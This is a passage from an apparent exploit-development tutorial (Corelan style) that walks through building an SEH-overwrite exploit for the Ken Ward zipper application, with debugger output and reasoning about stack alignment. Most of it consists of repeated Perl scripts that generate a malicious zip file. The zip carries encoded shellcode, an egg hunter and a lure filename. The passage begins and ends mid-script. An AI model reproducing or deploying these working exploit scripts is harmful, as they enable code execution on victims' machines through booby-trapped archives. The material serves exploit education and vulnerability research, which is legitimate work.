"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

print "[+] Writing shellcode to file\n";
open(FILE,">c:\\tmp\\shellcode.bin");
print FILE $shellcode;
close(FILE);
print "[+] Wrote " . length($shellcode)." bytes to file\n";

Create the zip file, trigger the crash in the debugger, let pop pop ret execute, and hold when you land at the jump back (at nseh). Don’t execute the jump back yet.

Look on the stack, and try to find the location where the egg hunter is located. A few minutes ago we found the begin of our payload somewhere before 0x0013F58E, so we should find our egg hunter somewhere around that location :

Our egg hunter is located exactly at 0x0013F58E (which makes sense, because we basically wrote the egg hunter directly after the spaces, and that is the same location where our A’s were found a few moments ago)

Look at the registers :

EAX 00000000
ECX 00415A68 zip4.00415A68
EDX 7C9032BC ntdll.7C9032BC
EBX 7C9032A8 ntdll.7C9032A8
ESP 0013F00C
EBP 0013F0E8
ESI 00000000
EDI 00000000
EIP 0013F908
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -UNORM 96D9 073C0000 02201372
ST1 empty +UNORM 1F80 00000171 BF820DF6
ST2 empty %#.19L
ST3 empty +UNORM 00F9 00000171 BC6B12B8
ST4 empty +UNORM 5000 00000000 BF820D30
ST5 empty -UNORM FF98 00000000 F4424D64
ST6 empty %#.19L
ST7 empty %#.19L
               3 2 1 0      E S P U O Z D I
FST 0220  Cond 0 0 1 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 1372  Prec NEAR,64  Mask    1 1 0 0 1 0

How can we now put 0x0013F58E into edx, in a reliable way ? We cannot just hardcode the address into edx…

In order to make it reliably, we have to take a value from another register, a value that is put in the register by the application itself… and then add or sub an offset from that register until edx points to the desired value.

What if we take the value of EBP ? It currently points at 0x0013F0E8. In order to get to 0x0013F58E, we need to add 1190 bytes to that address :

So that means that the instructions we need to execute in order to get the desired address into edx, and then jump to edx (to get the egg hunter to execute), could look something like this :

push ebp
pop edx
add edx,0x4A6
jmp edx

or, in opcode :

That’s 10 bytes of code that needs to be wrapped into a custom decoder. Good deal.

Preparing the custom decoder : align esp

Before we can look at building the custom decoder (to reproduce those 10 bytes of code), we need to figure out how we can make the decoder write these instructions so we can execute them in a reliable way.

The custom decoder, as you will see (or as you have already seen in the quickzip exploits), uses push eax instructions to write the original code to the stack. By making the stack pointer (esp) point at a location that sits below the decoder, the reproduced/original code gets executed when the decoder finishes running.

So before we get the custom decoder to run, we have to set esp to a good location first.

How would you approach this ? How can you, based on the current state of the registers and stack, make esp point to a good location ?

Go back to the debugger. We are still at the location where the code at nseh would trigger a jump back.

When the jump back would be made, we would end up at 0x0013F8A2, which is 102 bytes before the current location :

At that moment, ESP will still point to the 0013F00C, which is way before the current EIP location. So when the jump back is made, we will have to put some “esp alignment code”, followed by the custom decoder. The esp alignment code needs to make esp point to a location after the custom decoder.

Look back at the contents of the registers 2 screenshots ago. None of the registers points to a good address in that perspective. So basically we cannot just take a value from an existing register and put that in ESP, because none of the registers contains a value that points to a location that would end up after the custom decoder.

What would you do in this scenario ?

Answer : if we look on the stack, we can see that the 5th address on the stack may help us out :

esp currently points at 0x0013F00C. The 5th address from the top of the stack contains 0x0013F908 (which is the address of nseh – just fyi – doesn’t really matter that it’s nseh – only the address itself and how it relates to the location where the custom decoder will be placed is important)

That’s nice, if we can take this value from the stack and put it in esp after we made the jump back (at nseh) to 0x0013F8A2, then esp would point to an address (0x0013F908) that sits after 0x0013F8A2 (where the esp alignment code + custom decoder will be placed located).

So that means that we can do this :

Jump back at nseh (to 0x0013F8A2), and land at some code that would
pop 5 values from the stack and make esp point at the 5th address, and then
execute the custom decoder which will push the reproduced code to the stack. esp will point below the custom decoder, so when the custom decoder has finished :
the reproduced code will get executed and the jump to the egg hunter will be made

Sound fair, right ?

The total amount of code we can spend for the esp alignment code and the custom decoder = 102 bytes minus the 10 bytes of reproduced code (which will be pushed to esp at 0x0013F908).

Ok, what are the instructions we need to execute to align esp ?

we will simply do this :

pop eax (0×58) : takes first address from top of stack
pop eax (0×58) : takes second address from top of stack
pop eax (0×58) : takes third address from top of stack
pop eax (0×58) : takes fourth address from top of stack
pop esp (0x5c) : takes fifth address from top of stack and make esp point at it

0×58 = “X”. 0x5C = “\”. When building the exploit for quickzip, we noticed that a backslash would not do any harm. So let’s give it a try.

5 bytes of alignment code, 10 bytes of space for the reproduced code – that leaves us with 102 -5 – 10 = 87 bytes of available space for the custom decoder. Sound like a plan.

Let’s see if we can get esp to align first. We will change the exploit code, so the last 102 bytes before nseh would contain

the esp alignment code
some E’s (to indicate the space we will have available for the custom decoder)

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

#alpha2 encoded egg hunter - w00t - basereg EDX
my $egghunter="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAA".
"Q2AB2BB0BBABXP8ABuJIRFMQzjYotOqRaBCZuRbxxMFNW".
"LUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $espalign="\x58\x58\x58\x58\x5c";
my $decoder = "E" x (102 - length($espalign));
my $junk = $egghunter .
   "A" x ($offset - length($filename.$egghunter.$espalign.$decoder));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$junk.$espalign.$decoder.$nseh.$seh;

my $shellcode = "w00tw00t".
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

Create the zip file and load it into the application. Look at what it looks like before trying to trigger the crash :

Hmmm – that does not look as nice as it used to. The “fake” filename sits before the backslash (0x5c) in the payload, so it is treated as a folder name. The filename now contains EEEEEE’s (which is the space available for the custom decoder).

Attach the debugger and try to trigger the access violation :

“Couldn’t view file”… Ouch – it looks like the backslash broke our exploit.

Damn. How can we now make esp point to a good location if we cannot pop a new value into esp ? It even doesn’t really matter if we have to make esp point to a location below or above the custom decoder, because in order to so so, we’ll still want to pop a new value into esp.

Fixing the esp issue

This is what I did.

Instead of using the “forbidden” pop esp command, which would put a new value directly into esp, I used instructions that would modify the value of esp. A single pop or push instruction already influences esp, but we need to close a gap between the current address in esp (0x0013F00C) and a location below the custom decoder (let’s say 0x0013F908). There are 2300 bytes between those 2 locations, and a single pop would increase the value at ESP with 4 bytes.

That would mean that we would need to write 2300 / 4 = 575 pop instructions. Ok – can be done, but there is a faster way. Where a pop instruction increases esp with 4 bytes, a popad instruction ( = 0×61, which is also a valid character) will increase it with 32 bytes at once. That means that we would only need 2300 / 32 popad instructions = about 72 popad’s. That’s more like it.

The issue we have is that, instead of 5 bytes of esp alignment code, we would now need 72 popad’s. So after jumping back 102 bytes from nseh, there would not be enough space left to write our custom decoder before overwriting nseh. We will take care of this in a minute. First, it’s important to fully understand the impact of these changes.

A single popad would replace all values in all registers. We had the idea to use the current value in ebp, put that into edx, and add 1190 bytes to edx, to make edx point at the start location of the egg hunter.

This, obviously, cannot be done anymore. After a single popad, the value in ebp will be gone. So we will need to come up with another solution. Before we can build that solution, we need to see what the registers and stack look like after 72 popad’s are executed.

Furthermore, as stated earlier, we will replace the 5 esp-alignment code bytes with 72 popad’s, but there won’t be enough space left for the custom decoder.

So what we will do is jump back another 102 bytes and place our 72 popad’s about 204 bytes before nseh. That should give us more space to place and run the custom decoder.

The “test” payload buffer would look like this :

fake filename
egg hunter
filler1
72 popad’s
filler2 (up to 102 bytes)
jump back 102 bytes, to “72 popad’s”
filler3 (up to 102 bytes)

Total size of the payload buffer so far = 1022 bytes. Next, add to the buffer :

nseh (jump back to “jump back to 72 popad’s”)
seh
filler4
shellcode + “.txt”

Total size of the payload buffer = 4068 bytes

We will probably have to place the entire custom decoder at filler3, so at the end of filler2 we will have to jump to filler3 (to avoid ending up in a loop because of the jump back)

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

#alpha2 encoded egg hunter - w00t - basereg EDX
my $egghunter="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAA".
"Q2AB2BB0BBABXP8ABuJIRFMQzjYotOqRaBCZuRbxxMFNW".
"LUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $espalign="\x61" x 72;  #make esp happy
my $filler2 = "A" x (102-length($espalign));
my $jmpback="\x74\xf7";     #jump back 102 bytes - to $espalign
my $filler3 = "A" x (102-length($jmpback));
my $filler1= "A" x ($offset - length($filename.$egghunter.$espalign.$filler2.$jmpback.$filler3));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$egghunter.$filler1.
$espalign.$filler2.
$jmpback.$filler3.
$nseh.$seh;

my $shellcode = "w00tw00t".
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
"\x49\x71\x51\x70\x4c\x4b\x50\x6c\x47\x54\x44\x64\x4e\x6b" .
"\x51\x55\x45\x6c\x4e\x6b\x43\x64\x43\x35\x44\x38\x45\x51" .
"\x48\x6a\x4e\x6b\x51\x5a\x44\x58\x4e\x6b\x51\x4a\x47\x50" .
"\x47\x71\x48\x6b\x4b\x53\x50\x37\x42\x69\x4c\x4b\x46\x54" .
"\x4e\x6b\x46\x61\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4f\x30" .
"\x49\x6c\x4c\x6c\x4f\x74\x4f\x30\x51\x64\x47\x7a\x4a\x61" .
"\x4a\x6f\x46\x6d\x46\x61\x4b\x77\x4b\x59\x49\x61\x49\x6f" .
"\x49\x6f\x49\x6f\x47\x4b\x51\x6c\x45\x74\x44\x68\x42\x55" .
"\x49\x4e\x4e\x6b\x42\x7a\x47\x54\x46\x61\x4a\x4b\x43\x56" .
"\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x43\x6a\x45\x4c\x43\x31" .
"\x4a\x4b\x4e\x6b\x45\x54\x4e\x6b\x45\x51\x49\x78\x4b\x39" .
"\x43\x74\x45\x74\x45\x4c\x50\x61\x4f\x33\x4e\x52\x43\x38" .
"\x47\x59\x4b\x64\x4e\x69\x4a\x45\x4e\x69\x49\x52\x45\x38" .
"\x4e\x6e\x50\x4e\x46\x6e\x4a\x4c\x46\x32\x4d\x38\x4d\x4c" .
"\x4b\x4f\x49\x6f\x4b\x4f\x4d\x59\x51\x55\x44\x44\x4f\x4b" .
"\x51\x6e\x49\x48\x4a\x42\x42\x53\x4f\x77\x47\x6c\x45\x74" .
"\x46\x32\x49\x78\x4c\x4b\x49\x6f\x4b\x4f\x49\x6f\x4b\x39" .
"\x51\x55\x47\x78\x50\x68\x42\x4c\x42\x4c\x51\x30\x49\x6f" .
"\x45\x38\x50\x33\x46\x52\x44\x6e\x51\x74\x43\x58\x51\x65" .
"\x50\x73\x50\x65\x50\x72\x4d\x58\x43\x6c\x44\x64\x47\x7a" .
"\x4c\x49\x4b\x56\x50\x56\x4b\x4f\x51\x45\x47\x74\x4d\x59" .
"\x4f\x32\x42\x70\x4f\x4b\x4d\x78\x4f\x52\x50\x4d\x4d\x6c" .
"\x4c\x47\x47\x6c\x46\x44\x50\x52\x4a\x48\x51\x4e\x49\x6f" .
"\x4b\x4f\x49\x6f\x42\x48\x50\x4c\x42\x61\x42\x6e\x50\x58" .
"\x42\x48\x42\x63\x50\x4f\x42\x72\x51\x55\x45\x61\x49\x4b" .
"\x4e\x68\x51\x4c\x47\x54\x45\x57\x4b\x39\x4d\x33\x42\x48" .
"\x44\x32\x44\x33\x42\x78\x51\x30\x42\x48\x50\x73\x43\x59" .
"\x44\x34\x50\x6f\x43\x58\x43\x57\x51\x30\x44\x36\x51\x79" .
"\x50\x68\x51\x30\x50\x62\x50\x6c\x42\x4f\x42\x48\x46\x4e" .
"\x45\x33\x42\x4f\x50\x6d\x43\x58\x51\x63\x43\x43\x45\x35" .
"\x43\x53\x50\x68\x43\x71\x50\x62\x43\x49\x43\x43\x42\x48" .
"\x51\x64\x43\x58\x43\x55\x47\x50\x42\x48\x45\x70\x51\x64" .
"\x50\x6f\x51\x30\x45\x38\x50\x73\x45\x70\x51\x78\x50\x69" .
"\x51\x78\x47\x50\x43\x43\x45\x31\x50\x79\x51\x78\x46\x50" .
"\x45\x34\x47\x43\x42\x52\x45\x38\x42\x4c\x50\x61\x42\x4e" .
"\x51\x73\x50\x68\x50\x63\x42\x4f\x50\x72\x51\x75\x45\x61" .
"\x4a\x69\x4e\x68\x42\x6c\x45\x74\x46\x56\x4b\x39\x4b\x51" .
"\x50\x31\x49\x42\x50\x52\x50\x53\x46\x31\x46\x32\x49\x6f" .
"\x4a\x70\x44\x71\x4b\x70\x46\x30\x49\x6f\x42\x75\x43\x38" .
"\x46\x6a\x41\x41";

my $rest = "D" x ($size-length($payload.$shellcode));

$payload=$payload.$rest.$shellcode.".txt";

my $evilzip = $ldf_header.$payload.
              $cdf_header.$payload.
			  $eofcdf_header;

print "[+] Removing old zip file\n";
system("del $sploitfile");
print "[+] Writing payload to file\n";
open(FILE,">$sploitfile");
print FILE $evilzip;
close(FILE);
print "[+] Wrote ".length($evilzip)." bytes to file $sploitfile\n";
print "[+] Payload length : " . length($payload)."\n";

Create the zip file, load it in zip4.exe, attach the debugger, trigger the crash. Set a breakpoint at your SEH address and pass the exception. Breakpoint should be hit.

Step through the following instructions :

- let the pop pop ret execute and land at nseh

- the jump back instruction at nseh will execute a jump back to 0x0013F8A2, where our second jump back is located

- execute this second jump back, we land at the first popad instruction.

- step through all 72 popad instructions. Right after the last popad instruction is executed, our registers and stack look like this :

ESP now points at 0x0013F90C. EIP now sits at 0x0013F884, so that is above the address in ESP. That means that – if we can write to ESP, we might be able to get the reproduced decoded code to execute.

The first hurdle is taken.

The next step is to write the custom decoder. Before we can do that, we need to evaluate/modify the instructions that we want to get produced by the custom decoder.

The initial logic of using the value in ebp to populate edx doesn’t make sense anymore. ebp is now overwritten with 41414141, so we cannot use that address as an offset to the begin of the egg hunter. We need to use something that is dynamically generated, something that is already in the same address range, so we can just add or sub some bytes in order to get to the base address of the egg hunter.

Building the custom decoder

As explained above, we cannot take the value from ebp to build a new value in edx… But there’s an easy fix for this. Look at the stack again.

The 72 popad instructions made esp point at 0x0013F90C. The second address on the stack (at 0x0013F910) contains “0x0013F930″, so perhaps we can use that value as base for edx, and do some basic math, in order to make it point at the address of the egg hunter (0x0013F58E). In fact, if we put 0x0013F930 in edx, we have to subtract 930 bytes (0x3A2) from that value to get to our desired result :

sub edx,0x3A2 (\x81\xea\xa2\x03\x00\x00)
jmp edx (\xff\xe2)

= 8 bytes of opcode

In short, before the custom decoder will run, we need to get the 2nd address from the stack into edx. Easy : just do 2 pop edx instructions right after the 72 popad’s and we get what we want (0x5a = “Z”). Each pop instruction will change esp with 4 bytes, but we will still have plenty of space between the end of the custom decoder and the location where the reproduced code will be written to, to make it work.

Let’s see if our theory works :

# Exploit script for Ken Ward's zipper
# Written by Peter Van Eeckhoutte
# http://www.corelan.be:8800
#---------------------------------------------------
my $sploitfile="corelan_kenward.zip";
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

print "[+] Preparing payload\n";

#alpha2 encoded egg hunter - w00t - basereg EDX
my $egghunter="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAA".
"Q2AB2BB0BBABXP8ABuJIRFMQzjYotOqRaBCZuRbxxMFNW".
"LUUrzBTZOh8bWVPVPd4lK9jnOaezJloBUYwIoxgA";

my $size=4064;
my $offset=1022;
my $filename=  "Admin accounts and passwords.txt".(" " x 100);
my $espalign="\x61" x 72;  #make esp happy
my $edxalign="\x5a\x5a";  #make edx happy too
my $filler2 = "A" x (102-length($espalign.$edxalign));
my $jmpback="\x74\xf7";     #jump back 102 bytes - to $espalign
my $filler3 = "A" x (102-length($jmpback));
my $filler1= "A" x ($offset - length($filename.$egghunter.
   $espalign.$edxalign.$filler2.$jmpback.$filler3));
my $nseh="\x74\xf7\x90\x90";   #jump back 102 bytes
my $seh=pack('V',0x00415A68);
my $payload = $filename.$egghunter.$filler1.
$espalign.$edxalign.$filler2.
$jmpback.$filler3.
$nseh.$seh;

my $shellcode = "w00tw00t".
"\x89\xe2\xd9\xe8\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4a\x79\x48\x6b\x4f\x6b\x48\x59\x42\x54" .
"\x51\x34\x49\x64\x50\x31\x4a\x72\x4d\x62\x51\x6a\x45\x61" .
"\x4f\x39\x45\x34\x4c\x4b\x51\x61\x44\x70\x4c\x4b\x42\x56" .
"\x44\x4c\x4c\x4b\x50\x76\x47\x6c\x4e\x6b\x51\x56\x44\x48" .
"\x4c\x4b\x43\x4e\x47\x50\x4e\x6b\x45\x66\x46\x58\x50\x4f" .
"\x45\x48\x43\x45\x4c\x33\x51\x49\x43\x31\x4a\x71\x49\x6f" .
